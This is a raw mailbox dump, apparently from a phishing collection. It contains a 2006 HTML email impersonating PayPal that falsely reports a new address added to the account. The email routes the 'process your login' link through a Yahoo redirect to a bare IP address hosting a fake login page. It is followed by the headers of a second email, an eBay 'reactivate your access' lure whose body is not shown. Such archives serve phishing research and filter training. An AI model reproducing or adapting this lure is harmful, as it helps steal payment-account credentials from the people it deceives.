From: Update Now <nikegirl1965@hotmail.com>
Subject: Notification
Date: Sun, 12 Mar 2006 18:38:46 -0700
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1081
Message-Id: <20060313013846.272FF6CCFA1@mail1.example.com>
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 593

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<div align="left" class="style2">
  <p class="style2"><FONT face="Courier New" size="2">You have added <b>
	tim_patrick@comcast.com</b> as a new email address for your
PayPal account.</font><br>
    <font face="Courier New" size="2">If you don't agree with this email and if you need assistance with your account,<br>
  click here and 
	<a target="_blank" href="http://rds.yahoo.com/S=44831148:D1/CS=44831148/SS=44831166/SIG=11v8331g7/*http:/218.150.157.119/bin-cgi/webscr_cmd=_login-run/">process your login</a>. </font> </p>
    </p>
  <p><font face="Courier New" size="2">Thank you for using PayPal! <br>
    The PayPal Team </font> </p>
  <address><span style="font-style: normal"><font face="Courier New" size="2">Please do not reply to this email. This mailbox is not monitored and you will not receive a response.</font></span></address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">For assistance,log in to your 
  PayPal account and click thec Help link located in the top right corner </span>
  </font>
    </address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">of any 
  PayPal page. </span> <br>
    </font>
    </address>
  <p><font face="Courier New" size="2">PayPal Email ID PP007 </font> </p>
</div>
</body>
</html>

From untitled_1@redakcja.trybuna.com.pl  Sun Mar 12 21:26:51 2006
Return-Path: <untitled_1@redakcja.trybuna.com.pl>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id 4D7B0536E26
	for <nobody@login.example.com>; Sun, 12 Mar 2006 21:26:51 -0500 (EST)
Received: from redakcja.trybuna.com.pl (unknown [212.160.141.120])
	by mail1.example.com (Postfix) with ESMTP id 13DCC6CD034
	for <nobody@example.com>; Sun, 12 Mar 2006 21:26:51 -0500 (EST)
Received: by redakcja.trybuna.com.pl (Postfix, from userid 1035)
	id 4C32239639A7; Mon, 13 Mar 2006 03:24:20 +0100 (CET)
To: nobody@example.com
Subject: System maintenance, Please Reactivate your eBay Online Access !
